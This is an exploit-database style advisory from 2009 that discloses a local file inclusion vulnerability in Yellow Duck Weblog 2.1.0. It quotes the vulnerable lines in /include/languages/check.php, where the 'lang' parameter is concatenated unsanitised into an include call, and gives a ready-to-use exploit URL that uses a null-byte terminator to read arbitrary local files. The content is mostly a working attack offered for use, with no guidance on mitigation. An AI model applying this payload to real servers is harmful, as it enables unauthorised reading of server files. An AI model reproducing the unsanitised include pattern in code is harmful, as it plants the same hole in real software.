[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
# Published : 2009-04-13
# Author : ahmadbady
# Previous Title : X10Media Mp3 Search Engine < 1.6.2 Admin Access Vulnerability
# Next Title : XEngineSoft PMS/MGS/NM/AMS 1.0 (Auth Bypass) SQL Injection Vulns


=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Yellow Duck Weblog
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://prdownload.berlios.de/ydframework/YDWeblog-2.1.0-final.tar.gz

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /include/languages/check.php

$file = 'language_' . $_GET['lang'] . '.php'; line 9

include $file; line 20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-
xpl:
/path/include/languages/check.php?lang=[local file]%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-

# www.Syue.com [2009-04-13]